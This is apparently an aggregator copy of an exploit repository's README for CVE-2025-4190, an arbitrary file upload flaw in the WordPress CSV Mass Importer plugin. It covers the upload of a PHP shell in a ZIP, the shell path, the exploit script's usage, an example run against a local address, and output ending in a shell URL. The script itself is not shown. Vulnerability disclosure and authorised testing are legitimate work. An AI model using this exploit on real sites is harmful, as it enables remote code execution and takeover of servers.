来源

关联漏洞

介绍

# CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 Arbitrary File Upload

![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)  
![CVE](https://img.shields.io/badge/CVE-2025--4190-red)  
![Status](https://img.shields.io/badge/Status-Verified-brightgreen)  
![Author](https://img.shields.io/badge/Author-GadaLuBau_(GadaLuBau1337)-purple)

---

## 📌 Description

The **CSV Mass Importer** plugin (≤ 1.2) for WordPress contains an **Admin+ Arbitrary File Upload** vulnerability.  
Due to improper validation of uploaded files, high-privilege users (such as admin) can upload **arbitrary files** on the server, even when this should be restricted — for example in multisite setups.

This vulnerability allows an attacker to upload PHP shells or malicious files, leading to **remote code execution (RCE)** on the server.

_Discovered by **GadaLuBau (GadaLuBau1337)**._

---

## 🔥 Details

- **Plugin Name:** CSV Mass Importer  
- **Affected Version:** ≤ 1.2  
- **Vulnerability Type:** Admin+ Arbitrary File Upload  
- **CVE:** [CVE-2025-4190](https://wpscan.com/vulnerability/e525ece5-6e03-4aee-bf5b-6ae0b961f027/)  
- **WPVDB ID:** e525ece5-6e03-4aee-bf5b-6ae0b961f027  
- **Original Researcher:** GadaLuBau (GadaLuBau1337)  
- **Submitter Website:** [https://github.com/GadaLuBau1337](https://github.com/GadaLuBau)  
- **Verified:** ✅  

---

## 💻 Proof of Concept (PoC)

The plugin fails to properly check uploaded files when using the CSV import feature.  
A crafted ZIP file containing a PHP shell can be uploaded and extracted to a publicly accessible directory.

**Shell Path Example:**  
```
<target-url>/wp-content/uploads/cmi-data/gadalubau.php
```

---

## 🚀 Usage

### Script

This repository contains a ready Python exploit script: `4190.py`

### Help Menu

```bash
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By GadaLuBau (GadaLuBau1337)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password
```

### Example Run

```bash
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
```

### Expected Output

```
[+] Logged in successfully.
[+] Payload 'gadalubau.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/gadalubau.php
Exploited By GadaLuBau (GadaLuBau1337)
```

---

## 🕰 Timeline

- **Publicly Published:** 15-05-2025  
- **Added to Database:** 15-05-2025  
- **Last Updated:** 15-05-2025  

---

## 🛡 References

- [CVE-2025-4190 on WPScan](https://wpscan.com/vulnerability/e525ece5-6e03-4aee-bf5b-6ae0b961f027/)

---

## ⚠ Disclaimer

This code is provided for **educational purposes** only.  
The author is not responsible for any misuse or damage caused by this script.  
**Use responsibly and only on systems you are authorized to test.**

---

_Discovered and developed by GadaLuBau (GadaLuBau1337)_ 🌟

文件快照

 [4.0K]  /data/pocs/52726ee7c3dfa6bea90b261314b52ff2cc261222
├── [3.3K]  CVE-2025-4190.py
├── [3.2K]  README.md
└── [   8]  requirements.txt

0 directories, 3 files

备注